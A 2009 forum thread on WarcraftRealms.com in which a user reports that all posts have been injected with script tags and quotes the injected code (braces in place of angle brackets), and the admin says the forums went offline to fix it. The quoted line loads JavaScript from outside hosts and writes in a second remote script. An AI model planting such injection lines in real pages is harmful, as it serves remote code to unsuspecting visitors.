WarcraftRealms.com

General Forum for WarcraftRealms.com
http://162.254.149.72/forum3/

Attempted script injection on forum posts

http://162.254.149.72/forum3/viewtopic.php?f=3&t=4311

Page 1 of 1

Attempted script injection on forum posts

Posted: Fri Jul 10, 2009 3:23 am
by Kosh
Hi, I'm not sure how long this has been happening, but I just noticed that all posts now have some (badly) injected scripting showing up at the end of each post, but before any signature. Here's what shows up in plain text:

Code: Select all

{script src=http://cgi35.plala.or.jp/z32web30/tmp/css/css.js}{/script}document.write("{script src=http://cgi35.plala.or.jp/Mu/gwbbs/lock/eng/css.js}{/script}");
Sigh, angle brackets replaced with braces due to forum mis-parsing.


[edit] this post doesn't have the trailing garbage, making it appear more like the posts table has had an update run on it than an alteration in a PHP script.

Posted: Tue Jul 14, 2009 11:27 am
by Rollie
Yes, fighting the hackers takes up a ridiculous amount of my time. Hence why the forums were offline for a few days while I corrected the problem.

Posted: Tue Jul 14, 2009 11:47 pm
by Kosh
Yea, I figured that was the reason. :)
All times are UTC-06:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited